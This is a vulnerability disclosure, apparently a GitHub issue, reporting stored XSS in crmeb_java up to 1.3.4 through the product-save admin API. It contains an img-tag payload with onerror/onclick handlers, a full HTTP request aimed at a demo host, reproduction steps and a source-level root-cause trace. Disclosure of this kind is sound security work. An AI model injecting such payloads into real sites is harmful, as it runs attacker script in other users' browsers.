There is a stored XSS vulnerability in the /api/admin/store/product/save interface of the crmeb_java system #12
Description
[Suggested description]
Store XSS vulnerability exists in crmeb_java <=1.3.4
Failure to filter or validate parameters effectively results in stored XSS.
[Vulnerability Type]
Stored XSS
[Vendor of Product]
https://github.com/crmeb/crmeb_java
[Affected Product Code Base]
<=1.3.4
[Affected Component]
/api/admin/store/product/save
[Attack Type]
Remote
[Vulnerability details]
payload :
<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>Get the request message of the /api/admin/store/product/save interface.
POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg/"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}
The content parameter has a stored XSS vulnerability.
Insert the payload and send the request packet.
Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability.
There you can see it!
[Impact Code execution]
true
[Cause of vulnerability]
com.zbkj.admin.controller.StoreProductController line 77.
The save() method of storeProductService is called on line 77 of this controller
Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl.
On line 339, save the value of the content parameter in the request packet to the database.
Come to the front page.
In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render.
The reason for this vulnerability is that there is no legal security check on user data.
The end,thanks!